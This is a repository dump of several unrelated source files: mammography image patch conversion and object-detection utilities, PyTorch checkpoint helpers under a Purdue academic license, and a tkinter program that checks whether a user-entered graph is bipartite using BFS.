def batch_convert_patches(self, n_batch=None, method='valid'):
"""Convert image to patches
Args:
n_batch: number of images to convert
Returns:
None
"""
paired_dict = self.get_paired_image_and_mask()
keys = sorted(paired_dict.keys())
if n_batch is not None:
keys = keys[:n_batch]
for key in tqdm(keys):
logging.info('Cropping {}'.format(paired_dict[key]['image']))
image_array = fileio.load_image_to_array(paired_dict[key]['image'])
if len(image_array.shape) > 2:  # keep a single channel for multi-channel images
image_array = image_array[:, :, 1]
image_array = self._preprocess_image(image_array)
logging.info('Cropping {}'.format(paired_dict[key]['mask']))
mask_array = fileio.load_image_to_array(paired_dict[key]['mask'])
mask_array = self._preprocess_mask(mask_array, image_array.shape)
top_left_list = self.generate_top_left_list(image_array.shape, method=method)
idx = 0
idx_neg = 0
for top_left in top_left_list:
y, x = top_left
name = '_y{}_x{}'.format(y, x) # add name to indicate original position of the patch
patch_array = self.crop_patches(mask_array, top_left)
if self.ignore_padding > 0:
central_patch_array = patch_array[self.ignore_padding:-self.ignore_padding,
self.ignore_padding:-self.ignore_padding]
else:
central_patch_array = patch_array
if central_patch_array.astype(bool).sum() >= self.remove_zero_threshold:
self.save_patch_to_file(patch_array, key, idx, name=name, is_mask=True)
patch_array = self.crop_patches(image_array, top_left)
self.save_patch_to_file(patch_array, key, idx, name=name, is_mask=False)
idx += 1
else:
# negative patches: also save to file (with a '_neg' suffix in the name) if the image
# patch contains more than half FG. Otherwise discard.
patch_array = self.crop_patches(image_array, top_left)
if patch_array.astype(bool).sum() >= patch_array.size * self.remove_fg_threshold:
name = name + '_neg'
patch_array = self.crop_patches(mask_array, top_left)
self.save_patch_to_file(patch_array, key, idx_neg, name=name, is_mask=True)
patch_array = self.crop_patches(image_array, top_left)
self.save_patch_to_file(patch_array, key, idx_neg, name=name, is_mask=False)
idx_neg += 1
def _preprocess_image(self, image_array, interpolation=cv2.INTER_AREA):
"""Image level preprocessing. Reimplement base class dummy method"""
image_array = augmentation.resize(image_array, dst_shape=(0, 0), scale=self.scale, interpolation=interpolation)
# image_array = augmentation.pad(image_array, padding=(self.padding_size))
return image_array
def _preprocess_mask(self, mask_array, target_shape=None, interpolation=cv2.INTER_AREA):
"""Image level preprocessing. Reimplement this to add preprocessing"""
if target_shape and mask_array.shape != tuple(target_shape):
# dsize in the order of (x, y)
mask_array = augmentation.resize(mask_array, dst_shape=target_shape[::-1], interpolation=interpolation)
logging.debug('mask shape {}'.format(mask_array.shape))
return mask_array
def split_train_and_test(self, valid_size=0.2, test_size=0.1, random_state=42,
valid_txt_path=None, train_txt_path=None,
dry_run=True):
"""Split the output files in output_dir into train, valid and test dir
Split ratio
train : valid : test = (1 - valid_size - test_size) : valid_size : test_size
Note: If both valid_txt_path and train_txt_path are provided, use these txt files to split patches. In this case,
there is no test set.
Args:
valid_size: ratio of valid/all to split data
test_size: ratio of test/train to split data
dry_run: if True, do not move files
Returns:
None
"""
mask_files = self._find_data_files(os.path.join(self.output_dir, '*png'), suffix='_mask.png')
image_files = [file_path.replace('_mask', '') for file_path in mask_files]
def _move_files(files_list, subdir='train'):
for file_path in files_list:
new_dir = os.path.join(os.path.dirname(file_path), subdir)
fileio.maybe_make_new_dir(new_dir)
new_path = os.path.join(new_dir, os.path.basename(file_path))
if dry_run:
logging.debug('move {} to {}'.format(file_path, new_path))
else:
shutil.move(file_path, new_path)
image_files_valid = []
image_files_train = []
image_files_test = []
mask_files_valid = []
mask_files_train = []
mask_files_test = []
if valid_txt_path and train_txt_path:
valid_keys = [self.get_image_key_fn(filepath) for filepath in fileio.read_list_from_txt(valid_txt_path)]
train_keys = [self.get_image_key_fn(filepath) for filepath in fileio.read_list_from_txt(train_txt_path)]
for image_file, mask_file in zip(image_files, mask_files):
if self.get_image_key_fn(image_file) in valid_keys:
image_files_valid.append(image_file)
mask_files_valid.append(mask_file)
elif self.get_image_key_fn(image_file) in train_keys:
image_files_train.append(image_file)
mask_files_train.append(mask_file)
else:
raise ValueError('valid_txt_path and train_txt_path are not collectively exhaustive!')
else:
image_files_train, image_files_test, mask_files_train, mask_files_test = \
train_test_split(image_files, mask_files,
test_size=test_size + valid_size,
random_state=random_state)
image_files_valid, image_files_test, mask_files_valid, mask_files_test = \
train_test_split(image_files_test, mask_files_test,
test_size=test_size / (test_size + valid_size),
random_state=random_state)
logging.debug(len(image_files_train))
logging.debug(len(image_files_valid))
logging.debug(len(image_files_test))
_move_files(image_files_train, subdir='train')
_move_files(mask_files_train, subdir='train')
_move_files(image_files_valid, subdir='valid')
_move_files(mask_files_valid, subdir='valid')
_move_files(image_files_test, subdir='test')
_move_files(mask_files_test, subdir='test')
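# --- Editor's illustration (not part of the original module) ---
# A self-contained check of the two-stage split arithmetic used in split_train_and_test
# above: the first train_test_split holds out (valid_size + test_size) of the data, and
# the second split carves test_size / (valid_size + test_size) of that holdout into the
# test set. The helper below is hypothetical and only reproduces the ratio math.
def _split_ratio_example(valid_size=0.2, test_size=0.1):
    """Return the resulting (train, valid, test) fractions."""
    holdout = valid_size + test_size
    test_share = holdout * (test_size / holdout)
    valid_share = holdout - test_share
    return 1.0 - holdout, valid_share, test_share
# _split_ratio_example() -> approximately (0.7, 0.2, 0.1), i.e. the intended 70/20/10 split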
class ToyPatchConverter(PatchConverter):
"""Toy model for sanity check"""
def __init__(self):
image_search_path = r'/data/log/mammo/toy/random_image.png*'
mask_search_path = r'/data/log/mammo/toy/random_mask.png*'
output_dir = r'/data/log/mammo/toy/random/'
super().__init__(image_search_path, mask_search_path, output_dir,
block_size=(512, 512), overlap=(256, 256),
image_suffix='.png', mask_suffix='.png',
remove_zero_threshold=100)
def deploy(self):
self.batch_convert_patches()
class MassOrCalcPatchConverter(PatchConverter):
def __init__(self, image_search_path, mask_search_path, output_dir, valid_txt_path=None, train_txt_path=None,
dataset='inbreast', scale=0.25, ignore_padding=0, remove_zero_threshold=0, remove_fg_threshold=0.5,
crop_method='valid', whole_image=False):
if whole_image:
# override parameters for whole image
remove_zero_threshold = 0
remove_fg_threshold = 0
crop_method = 'padding'
super().__init__(image_search_path, mask_search_path, output_dir,
block_size=(512, 512), overlap=(256, 256),
image_suffix='.png', mask_suffix='.png',
scale=scale,
ignore_padding=ignore_padding,
remove_zero_threshold=remove_zero_threshold,
remove_fg_threshold=remove_fg_threshold)
self.valid_txt_path = valid_txt_path
self.train_txt_path = train_txt_path
self.dataset = dataset
self.crop_method = crop_method
def get_image_key_fn(self, filepath):
if self.dataset in ['ddsm']:
return os.path.basename(filepath).split('.')[0]
elif self.dataset in ['china', 'inbreast']:
return os.path.basename(filepath).split('.')[0].split('_')[0]
def get_mask_key_fn(self, filepath):
if self.dataset in ['ddsm']:
return os.path.basename(filepath).split('_mask')[0]
elif self.dataset in ['china', 'inbreast']:
return os.path.basename(filepath).split('.')[0].split('_')[0]
def deploy(self):
self.batch_convert_patches(method=self.crop_method)
self.split_train_and_test(test_size=0.1, valid_size=0.2, dry_run=False,
valid_txt_path=self.valid_txt_path,
train_txt_path=self.train_txt_path)
if __name__ == '__main__':
print('so far so good')
import doctest
doctest.testmod()
# set up flags
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('task', '', 'mass or calc training')
tf.app.flags.DEFINE_string('dataset', 'inbreast', 'inbreast or ddsm or china for mass training')
tf.app.flags.DEFINE_boolean('ignore_single_point', True, 'Whether to ignore single point annotation for calc')
tf.app.flags.DEFINE_boolean('whole_image', False, 'Whether to crop whole image')
tf.app.flags.DEFINE_float('scale', 0.25, 'Ratio to scale down original image before cropping patches')
logging.getLogger().setLevel(logging.INFO)
logging.debug(FLAGS.task)
## patch conversion
if FLAGS.task == 'calc_crop':
image_search_path = r'/data1/Image_data/Mammography_data/INbreast/AllPNG_norm_6_6/*png'
if FLAGS.ignore_single_point:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask_ignore_single_point/*png'
else:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask/*png'
valid_txt_path = r'/data1/Image_data/Mammography_data/INbreast/valid.txt'
train_txt_path = r'/data1/Image_data/Mammography_data/INbreast/train.txt'
output_dir = '/data1/Image_data/Mammography_data/log/calc_patches'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
# for a smaller dataset of synthesized calcifications.
elif FLAGS.task == 'calc_crop_synth':
image_search_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/synthesis_image/*png'
if FLAGS.ignore_single_point:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/synthesis_mask/*png'
else:
mask_search_path = r'/data1/Image_data/Mammography_data/INbreast/calc_mask/*png'
valid_txt_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/valid.txt'
train_txt_path = r'/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/train.txt'
output_dir = '/data1/Image_data/Mammography_data/INbreast/Calc_synthesis/20190711/calc_patches/'
fileio.maybe_make_new_dir(output_dir)
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
elif FLAGS.task == 'calc_cluster_crop':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/png/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/calc_cluster/bootstrap_mask_cleaned/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/evaluation/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/evaluation/train.txt'
output_dir = '/data/log/mammo/calc_cluster_patches'
# output_dir = '/data/log/mammo/calc_cluster_crop_affine_pos'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=1.0,
ignore_padding=0,
remove_zero_threshold=25).deploy()
elif FLAGS.task == 'mass_crop':
if FLAGS.dataset == 'inbreast':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/AllPNG_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/mass_mask/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/INbreast/train.txt'
elif FLAGS.dataset == 'ddsm':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/CBIS_DDSM/mass_mask/image_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/CBIS_DDSM/mass_mask/*png'
valid_txt_path = None
train_txt_path = None
elif FLAGS.dataset == 'china':
image_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/AllPNG_norm_6_6/*png'
mask_search_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/mass_mask_etc/*png'
valid_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/valid.txt'
train_txt_path = r'/media/Data/Data02/Datasets/Mammogram/Ziwei_WIP/train.txt'
else:
raise ValueError('Unsupported dataset {}'.format(FLAGS.dataset))
output_dir = '/data/log/mammo/mass_patches_area'
MassOrCalcPatchConverter(image_search_path, mask_search_path, output_dir,
valid_txt_path=valid_txt_path,
train_txt_path=train_txt_path,
scale=FLAGS.scale,
dataset=FLAGS.dataset,
whole_image=FLAGS.whole_image,
ignore_padding=128,
remove_zero_threshold=100).deploy()
else:
raise ValueError('Unknown task: {}'.format(FLAGS.task))
<file_sep>"""
This file contains common utility functions for object detection
"""
import json
import glob2
import numpy as np
import os
import pandas as pd
import xmltodict
from projects.drutils import data
from projects.drutils import fileio
from projects.mammo_seg.dataset import ddsm
def write_result_dict(result_dict,
output_filepath,
is_append=True):
"""Write result_dict to text file
result_dict has the following keys:
key:
detection_boxes:
detection_scores:
detection_classes:
Args:
result_dict:
output_filepath:
is_append: if True, append to existing file
Returns:
None
"""
result_dict_copy = dict(result_dict)
result_dict_copy.pop('original_image') # original image is extremely space consuming in text format
for key, val in result_dict_copy.items():
if type(val) is np.ndarray:
result_dict_copy[key] = result_dict_copy[key].tolist()
if isinstance(val, bytes):
result_dict_copy[key] = result_dict_copy[key].decode('utf-8')
open_mode = 'a' if is_append else 'w'
with open(output_filepath, open_mode) as f_out:
json.dump(result_dict_copy, f_out, sort_keys=True, indent=4, separators=(',', ': '))
def get_result_dict_list_from_txt(result_dict_list_path):
"""Get a list of json objects from a file path
Each JSON object (dictionary) is read from a text file. Each dictionary is
evaluated from a tensor_dict (see write_result_dict above for the expected keys).
Args:
result_dict_list_path: path to a txt containing multiple json objects
Returns:
result_dict_list: a list of dictionaries
"""
with open(result_dict_list_path, 'r') as f_in:
text = f_in.read()
# use `}{` to break multiple json objects
# TODO: Add more robust parsing mechanism to detect if there is multiple json in the same txt
text = text.replace('}{', '}###{')
json_text_list = text.split('###')
result_dict_list = []
for json_text in json_text_list:
result_dict = json.loads(json_text)
for key, val in result_dict.items():
if isinstance(val, list):
result_dict[key] = np.array(val)
result_dict_list.append(result_dict)
return result_dict_list
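# --- Editor's illustration (not part of the original module) ---
# A minimal example of the '}{' splitting trick used in get_result_dict_list_from_txt
# above, applied to an in-memory string instead of a file. The helper name is
# hypothetical; it assumes the objects are concatenated with no whitespace in between,
# the same assumption the function above makes.
def _split_concatenated_json_example(text):
    """Split back-to-back JSON objects such as '{"a": 1}{"b": 2}' into a list of dicts."""
    chunks = text.replace('}{', '}###{').split('###')
    return [json.loads(chunk) for chunk in chunks]
# _split_concatenated_json_example('{"a": 1}{"b": 2}') -> [{'a': 1}, {'b': 2}]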
def get_bbox_list_from_xml_file(xml_path, is_rescale=False, min_dimension=-1, max_dimension=-1, class_name='pathology'):
"""Get list of bbox coordinates given a path of an xml file
All coordinates are in the order of (ymin, xmin, ymax, xmax), following the convention in `tf_example_decoder.py`
Args:
xml_path: the path to the xml annotation file
is_rescale: flag indicating whether to do rescale or not
min_dimension:
max_dimension:
class_name: name of the csv column used to look up the class of each bbox
Returns:
bbox_list: numpy array of coordinates
class_list: list of bbox classes
"""
if not xml_path:
print('xml path not found {}'.format(xml_path))
return [], []
with open(xml_path, 'r') as f_in:
doc = xmltodict.parse(f_in.read())
# print(json.dumps(doc, sort_keys=True,
# indent=4, separators=(',', ': ')))
if is_rescale:
if min_dimension == -1 and max_dimension == -1:
raise ValueError('min_dimension and max_dimension cannot both be -1 when is_rescale is True')
width = float(doc['annotation']['size']['width'])
height = float(doc['annotation']['size']['height'])
# TODO: add option to use partial dimensions
width_new, height_new = data.get_new_dimensions((width, height), min_dimension, max_dimension)
rescale_factor = width_new / width
else:
rescale_factor = 1
bbox_list = []
obj_list = doc['annotation']['object']
# 'object' may be a list of jsons
if not isinstance(obj_list, list):
obj_list = [obj_list]
for obj in obj_list:
bbox_coord = []
for key in ['ymin', 'xmin', 'ymax', 'xmax']:
bbox_coord.append(float(obj['bndbox'][key]) * rescale_factor)
bbox_list.append(bbox_coord)
bbox_list = np.array(bbox_list)
# print(bbox_list)
# TODO: get everything from csv
barename = os.path.basename(xml_path)
barename = os.path.splitext(barename)[0]
df = pd.read_csv(ddsm.generate_ddsm_dict()['csv_path'])
rows = df[df['filename'].str.contains(barename)]
class_list = rows[class_name].tolist()
print(class_list)
return bbox_list, class_list
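# --- Editor's illustration (not part of the original module) ---
# A self-contained sketch of how xmltodict exposes a Pascal-VOC style annotation,
# mirroring the access pattern in get_bbox_list_from_xml_file above. The XML string
# and helper below are made up for demonstration only.
_EXAMPLE_VOC_XML = (
    '<annotation>'
    '<size><width>100</width><height>200</height></size>'
    '<object><bndbox><ymin>10</ymin><xmin>20</xmin><ymax>30</ymax><xmax>40</xmax></bndbox></object>'
    '</annotation>'
)
def _parse_example_bbox(xml_text=_EXAMPLE_VOC_XML):
    doc = xmltodict.parse(xml_text)
    obj_list = doc['annotation']['object']
    # a single <object> comes back as a dict rather than a list
    if not isinstance(obj_list, list):
        obj_list = [obj_list]
    return [[float(obj['bndbox'][key]) for key in ('ymin', 'xmin', 'ymax', 'xmax')]
            for obj in obj_list]
# _parse_example_bbox() -> [[10.0, 20.0, 30.0, 40.0]]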
def get_xml_file_path_from_image_name(image_name, xml_dir_or_txt):
"""Retrieve xml filepath from xml dir
Args:
image_name:
xml_dir_or_txt:
Returns:
xml_path:
"""
if os.path.isfile(xml_dir_or_txt):
filepaths = fileio.read_list_from_txt(xml_dir_or_txt, field=-1)
elif os.path.isdir(xml_dir_or_txt):
filepaths = list(glob2.glob(os.path.join(xml_dir_or_txt, '**', '*xml')))
else:
raise ValueError('xml_dir_or_txt is neither a directory nor file')
image_name_no_ext = os.path.splitext(os.path.basename(image_name))[0]
xml_path_list = []
for filepath in filepaths:
if image_name_no_ext in filepath:
xml_path_list.append(filepath)
# print(filepath)
assert len(xml_path_list) <= 1, 'xml_path_list expect 0 or 1 element but found {}!'.format(len(xml_path_list))
if len(xml_path_list) == 1:
xml_path = xml_path_list[0]
else:
xml_path = None
return xml_path
<file_sep>__copyright__ = \
"""
Copyright © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
__license__ = "CC BY-NC-SA 4.0"
__authors__ = "<NAME>, <NAME>, <NAME>, <NAME>"
__version__ = "1.5.1"
import h5py
import numpy as np
import torch
import shutil
def save_net(fname, net):
with h5py.File(fname, 'w') as h5f:
for k, v in net.state_dict().items():
h5f.create_dataset(k, data=v.cpu().numpy())
def load_net(fname, net):
with h5py.File(fname, 'r') as h5f:
for k, v in net.state_dict().items():
param = torch.from_numpy(np.asarray(h5f[k]))
v.copy_(param)
def save_checkpoint(state, is_best, task_id, filename='checkpoint.pth.tar'):
torch.save(state, task_id+filename)
if is_best:
shutil.copyfile(task_id+filename, task_id+'model_best.pth.tar')
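# --- Editor's illustration (not part of the original module) ---
# A hypothetical round trip with the helpers above, shown as comments so nothing runs
# on import; the file name is made up for demonstration only.
#
#   net = torch.nn.Linear(4, 2)
#   save_net('/tmp/example_weights.h5', net)
#   restored = torch.nn.Linear(4, 2)
#   load_net('/tmp/example_weights.h5', restored)
#   assert torch.allclose(net.weight, restored.weight)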
"""
Copyright © (c) 2019 The Board of Trustees of Purdue University and the Purdue Research Foundation.
All rights reserved.
This software is covered by US patents and copyright.
This source code is to be used for academic research purposes only, and no commercial use is allowed.
For any questions, please contact <NAME> (<EMAIL>) at Purdue University.
Last Modified: 03/03/2019
"""
|
5b2302a600e12c1b553e1d11a93f01883fec2065
|
[
"Markdown",
"Python"
] | 37
|
Python
|
lvxingvir/template
|
089f5817e031a7c2b2d82e239158a6a5488b3b26
|
2835ad4762dafca4b1b705b59dc3b4301afcba9e
|
refs/heads/master
|
<file_sep>let city = sessionStorage.getItem("cityInSearchBar");
let tempType = 'metric';
let degree = '°';
let tempLetter = 'C';
let loadCount = sessionStorage.getItem("loadCount") || 0;
if(tempType == 'imperial') {
tempLetter = 'F';
}
$.getJSON(`https://cors-anywhere.herokuapp.com/http://api.openweathermap.org/data/2.5/weather?q=${city}&APPID=c08f28491a3a2bbb6672e149c1e6342e&units=${tempType}`).done(callBack).fail(jsonFail);
let pictures = [
{
type: "Clear",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/clearNight.jpg",
website: "https://pixabay.com/photos/british-columbia-canada-clear-lake-2382640/",
host: "Pixabay"
},
{
type: "Clear",
timeOfDay: "day",
creator: "Pixabay",
url: "Photos/clearDay.jpg",
website: 'https://www.pexels.com/photo/skyscrapers-in-city-against-clear-sky-316137/',
host: "Pexels"
},
{
type: "Clouds",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/cloudsNight.jpg",
website: "https://unsplash.com/photos/Ta9_HNeuQkU",
host: "Unsplash"
},
{
type: "Clouds",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/cloudsDay.jpg",
website: "https://www.pexels.com/photo/aerial-architecture-blue-sky-buildings-466685/",
host: "Pexels"
},
{
type: "Thunderstorm",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/thunderstorm.jpg",
website: "https://www.pexels.com/photo/lightning-and-gray-clouds-1162251/",
host: "Pexels"
},
{
type: "Thunderstorm",
timeOfDay: "day",
creator: "skeeze",
url: "Photos/lightningDay.jpg",
website: "https://pixabay.com/photos/lightning-strike-bolt-electricity-2617904/",
host: "Pixabay"
},
{
type: "Drizzle",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/drizzle.jpg",
website: "https://www.pexels.com/photo/woman-walking-in-the-street-during-night-time-1134166/",
host: "Pexels"
},
{
type: "Drizzle",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/drizzleDay.jpg",
website: "https://www.pexels.com/photo/raining-in-the-city-2448749/",
host: "Pexels"
},
{
type: "Rain",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/rainNight.jpg",
website: "https://unsplash.com/photos/GXEZuWo5m4I",
host: "Unsplash"
},
{
type: "Rain",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/rainDay.jpg",
website: "https://www.pexels.com/photo/person-riding-a-bicycle-during-rainy-day-763398/",
host: "Pexels"
},
{
type: "Snow",
timeOfDay: "night",
creator: "<NAME>",
url: "Photos/snowNight.jpg",
website: "https://www.pexels.com/photo/rain-of-snow-in-town-painting-730256/",
host: "Pexels"
},
{
type: "Snow",
timeOfDay: "day",
creator: "<NAME>",
url: "Photos/snowDay.jpg",
website: "https://unsplash.com/photos/kVKz9qnJC-k",
host: "Unsplash"
},
{
type: "Mist",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/mist.jpg",
website: "https://www.pexels.com/photo/aerial-photography-of-city-buildings-under-cloudy-sky-2310885/",
host: "Pexels"
},
{
type: "Smoke",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/smoke.jpg",
website: "https://unsplash.com/photos/Pia51dSIwd0",
host: "Unsplash"
},
{
type: "Haze",
timeOfDay: "any",
creator: "Ishan @seefromthesky",
url: "Photos/haze.jpg",
website: "https://unsplash.com/photos/6U-sSfBV-gM",
host: "Unsplash"
},
{
type: "Dust",
timeOfDay: "any",
creator: "carloyuen",
url: "Photos/dust.jpg",
website: "https://pixabay.com/photos/skyscraper-dust-fog-foggy-2517650/",
host: "Pixabay"
},
{
type: "Ash",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/ash.jpg",
website: "https://unsplash.com/photos/KRttQCXUjNI",
host: "Unsplash"
},
{
type: "Squall",
timeOfDay: "any",
creator: "SturmjaegerTobi",
url: "Photos/squall.jpg",
website: "https://pixabay.com/photos/sky-squall-line-storm-thunderstorm-3176547/",
host: "Pixabay"
},
{
type: "Tornado",
timeOfDay: "any",
creator: "<NAME>",
url: "Photos/tornado.jpg",
website: "https://unsplash.com/photos/LYq7W1lRal4",
host: "Unsplash"
}
];
function callBack(data) {
console.log(data);
console.log(data.name);
console.log(Math.round(data.main.temp));
console.log(data.weather[0].main);
let pic = pictures.find(x => (x.type == data.weather[0].main) && (x.timeOfDay == "any" || x.timeOfDay == getTime(data.timezone)));
console.log(data.sys.country);
document.getElementById('city').innerHTML = data.name;
document.getElementById('temp').innerHTML = Math.round(data.main.temp) + degree + tempLetter;
document.getElementById('weather').innerHTML = data.weather[0].main;
document.getElementById('creator').innerHTML = `Photo by ${pic.creator} from ${pic.host}`;
document.getElementById('site').href = pic.website;
document.getElementsByTagName('body')[0].style = `background-image: url(${pic.url});
background: linear-gradient(
rgba(54, 53, 53, 0.5),
rgba(49, 48, 48, 0.5)),
url(${pic.url});
background-size: 1920px 1080px;`;
}
function jsonFail(){
if(sessionStorage.getItem("cityInSearchBar") == null && loadCount == 0){
document.getElementById('city').innerHTML = "Welcome to Minimalist Weather!"
document.getElementById('temp').innerHTML = "Type in the search bar to get the weather of the city you desire!";
document.getElementById('creator').innerHTML = `Photo by ${pictures[1].creator} from ${pictures[1].host}`;
document.getElementById('site').href = pictures[1].website;
document.getElementsByTagName('body')[0].style = `background-image: url(${pictures[1].url});
background: linear-gradient(
rgba(54, 53, 53, 0.5),
rgba(49, 48, 48, 0.5)),
url(${pictures[1].url});
background-size: 1920px 1080px;`;
}
else {
document.getElementById('city').innerHTML = "City not found";
document.getElementById('temp').innerHTML = "Please search again";
}
}
function toMetric() {
let t = document.getElementById('temp').innerHTML;
t = t.substring(0, t.length - 2);
if(tempType == 'imperial') {
tempLetter = 'C';
document.getElementById('temp').innerHTML = Math.round((t - 32) * (5/9)) + degree + tempLetter;
tempType = "metric";
}
}
function toImperial() {
let t = document.getElementById('temp').innerHTML;
t = t.substring(0, t.length - 2);
if(tempType == 'metric') {
tempLetter = 'F';
document.getElementById('temp').innerHTML = Math.round((t * (9/5)) + 32) + degree + tempLetter;
tempType = "imperial";
}
}
let enter = document.getElementById('search-bar');
if(enter) {
enter.addEventListener("keyup",function(event){
if(event.keyCode === 13) {
event.preventDefault();
document.getElementById('search-btn').click();
}
});
};
function actSearch() {
city = document.getElementById('search-bar').value;
sessionStorage.setItem("cityInSearchBar", city);
loadCount++;
sessionStorage.setItem("loadCount", loadCount);
window.location.reload();
}
function getTime(seconds){
let n = new Date();
let hours = seconds/3600;
if(n.getUTCHours() + hours >= 6 && n.getUTCHours() + hours <= 18) {
return "day";
} else {
return "night";
}
}
|
f1de9102cacb1af80100582d1cd675f266ec3af9
|
[
"JavaScript"
] | 1
|
JavaScript
|
valinslav/minimalistweather
|
b30e717ff070d077e85081785462b2162e1e5831
|
0c6d67957aa9411ba24704c64b008cf5a97703b3
|
refs/heads/master
|
<file_sep>Program for checking whether a graph is bipartite, given its adjacency list
example of a graph that is bipartite

example of a non-bipartite graph

<file_sep>import tkinter as tk
from tkinter import *
class List():
def __init__(self):
self.vertex = 0
self.Adj = []
self.C = [False] * self.vertex # visit
self.G = [3] * self.vertex # color
self.k = 0
# -1 - Red
# 1 - Black
def add(self, strbuf):
q = True
for i in range(0,len(strbuf)):
if strbuf[i].isdigit():
q = True
else:
q = False
break
if q:
self.k +=1
Str = "Enter the vertices connected to vertex " + str(self.k)
show1.set(Str)
showLabe1 = Label(root, textvariable = show1)
showLabe1.place(x=0, y=120, width=300, height=15)
buf = []
for i in range(0, len(strbuf)):
buf.append(int(strbuf[i]))
self.Adj.append(buf[:])
show4.set("All good")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
else:
show4.set("Vertices entered incorrectly")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
def addvertex(self):
buf = entry.get()
if str(buf).isdigit():
k = int(buf)
self.vertex = k
self.C = [False] * self.vertex # visit
self.G = [3] * self.vertex # color
show4.set("All good")
showLabe4 = Label(root, textvariable=show4)
showLabe4.place(x=0, y=325, width=300, height=35)
else:
show4.set("Number of vertices entered incorrectly")
showLabe4 = Label(root, textvariable = show4)
showLabe4.place(x=0, y=325, width=300, height=35)
def Print(self):
show2.set(self.Adj)
showLabe2 = Label(root, textvariable=show2)
showLabe2.place(x=0, y=205, width=300, height=15)
print(self.vertex,self.Adj)
def bfs(self, graph, start):
queue = [start]
self.G[start] = 1
self.C[start] = True
while queue:
temp = queue.pop(0)
for g in graph[temp]:
if (self.C[g]):
# print("g = ", g," G[g] = ", G[g], " temp = ",temp, " G[temp] = " ,G[temp])
if (self.G[g] == self.G[temp]):
return False
continue
else:
self.C[g] = True
self.G[g] = self.G[temp] * (-1)
queue.append(g)
return True
def work(self):
if self.bfs(self.Adj, 0): msg = "yes, the graph is bipartite"
else: msg = "no, the graph is not bipartite"
show3.set(msg)
showLabe3 = Label(root, textvariable=show3)
showLabe3.place(x=0, y=290, width=300, height=35)
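# --- Editor's illustration (not part of the original program) ---
# The same BFS two-colouring idea as List.bfs above, as a small stand-alone function
# with no tkinter dependency. Like the original, it only inspects the connected
# component that contains `start`. The adjacency lists in the comments are hypothetical.
def _is_bipartite_example(adj, start=0):
    color = {start: 1}
    queue = [start]
    while queue:
        v = queue.pop(0)
        for u in adj[v]:
            if u in color:
                if color[u] == color[v]:
                    return False
            else:
                color[u] = -color[v]
                queue.append(u)
    return True
# _is_bipartite_example([[1], [0, 2], [1]]) -> True (a path graph is bipartite)
# _is_bipartite_example([[1, 2], [0, 2], [0, 1]]) -> False (an odd cycle is not)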
dll = List()
root = Tk()
root.title("Graph")
root.geometry("300x400")
show = StringVar()
show1 = StringVar()
show2 = StringVar()
show3 = StringVar()
show4 = StringVar()
entry = StringVar()
entry1 = StringVar()
def add():
dll.add(entry1.get().split())
def showS():
show.set(dll.show())
def Task():
dll.sort()
show.set(dll.show())
def Print():
dll.Print()
show.set("Enter the number of graph vertices")
showLabe = Label(root, textvariable = show)
showLabe.place(x = 0, y = 0, width = 300, height = 35)
addEntry = Entry(root, textvariable = entry)
addEntry.place(x = 0, y = 35, width = 300, height = 35)
addButton = Button(root, text="Enter number of vertices", command = dll.addvertex )
addButton.place(x=0, y= 70, width=300, height=35)
show1.set("Enter the vertices connected to vertex " + str(0))
showLabe1 = Label(root, textvariable = show1)
showLabe1.place(x=0, y= 120, width=300, height=15)
addEntry1 = Entry(root, textvariable = entry1)
addEntry1.place(x = 0, y = 135, width = 300, height = 35)
addButton1 = Button(root, text="Add element", command = add )
addButton1.place(x=0, y= 170, width=300, height=35)
show2.set("")
showLabe2 = Label(root, textvariable = show2)
showLabe2.place(x=0, y= 205, width=300, height=15)
